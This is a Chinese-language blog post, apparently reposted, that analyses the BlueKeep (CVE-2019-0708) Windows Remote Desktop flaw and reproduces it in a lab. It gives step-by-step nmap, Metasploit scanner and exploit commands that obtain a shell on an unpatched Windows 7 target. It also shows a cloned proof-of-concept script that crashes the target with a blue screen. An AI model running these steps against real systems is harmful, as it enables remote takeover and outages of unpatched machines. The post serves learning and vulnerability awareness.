CVE-2019-0708(BlueKeep)漏洞分析与复现
文章目錄
- 一、 漏洞簡介
- 1、漏洞介紹:
- 2、漏洞原理:
- 3、影響版本:
- 二、 漏洞復現
- 復現環境:
- 復現過程:
- 1、主機發現:
- 2、使用MSF的漏洞模塊:
- 3、對靶機進行漏洞掃描:
- 4、使用攻擊模塊,對靶機進行攻擊
- 5、使用POC,進行藍屏攻擊
一、 漏洞簡介
1、漏洞介紹:
2019年5月14日微軟官方發布安全補丁,修復了 Windows 遠程桌面服務的遠程代碼執行漏洞,該漏洞影響了某些舊版本的 Windows 系統。此漏洞是預身份驗證,無需用戶交互,這就意味著這個漏洞可以通過網絡蠕蟲的方式被利用,與2017年 WannaCry 勒索病毒的傳播方式類似。
2、漏洞原理:
存在漏洞的遠程桌面服務器,在接收到特殊數據包時會釋放一個內部信道 MS_T120 的控制結構體,但并未將指向該結構體的指針刪除,而且在遠程桌面連接結束之后還會調用 MS_T120 結構體內的一個函數指針,若攻擊者可通過遠程發送數據重新占據被釋放的 MS_T120,并為結構體內的函數指針賦恰當的值,即可實現遠程命令執行。
3、影響版本:
目前已知受影響的 Windows 版本包括但不限于:
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP
Windows 8 和 windows10 以及之后的版本不受此漏洞影響
二、 漏洞復現
復現環境:
-
攻擊機:Linux kali(IP:192.168.50.130)
-
靶機:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)
條件:兩臺機子可以相互ping通,并且靶機(無補丁)開啟了3389端口,防火墻是關閉的!
復現過程:
1、主機發現:
登錄 kali linux,用 nmap 探測本網段存活主機
nmap 192.168.50.0/24
可以看到靶機的3389端口是開放的。
2、使用MSF的漏洞模塊:
打開MSF:msfconsole
搜索 CVE-2019-0708 漏洞模塊
search cve-2019-0708
得到兩個模塊,一個是掃描功能,一個是攻擊功能。
3、對靶機進行漏洞掃描:
使用模塊:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep設置目標IP或網段:
set rhosts 192.168.50.132執行掃描:run
結果顯示靶機存在這個漏洞。
4、使用攻擊模塊,對靶機進行攻擊
使用攻擊模塊:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce設置攻擊目標IP
set rhosts 192.168.50.132查看當前攻擊配置
show options執行攻擊:exploit 或 run
發現攻擊失敗了,查了一下,知道這里還需要設置 target 參數,指定靶機的安裝環境。這里默認是自動識別。
查看 target
1是真實機器,這里根據真實情況,選擇5
再次執行攻擊
攻擊成功!并且得到靶機的shell。
5、使用POC,進行藍屏攻擊
1、下載poc
git clone https://github.com/n1xbyte/cve-2019-07082、安裝所需要的庫
kali里默認沒有pip3,先安裝pip3,再安裝impacket庫
apt-get install python3-pippip3 install impacket3、執行POC攻擊
python3 crashpoc.py 192.168.50.132 64 #ip地址 系統版本
成功藍屏!
總結
以上是生活随笔為你收集整理的CVE-2019-0708(BlueKeep)漏洞分析与复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: MS17-010(永恒之蓝)漏洞分析与复
- 下一篇: /etc/passwd 与 /etc/s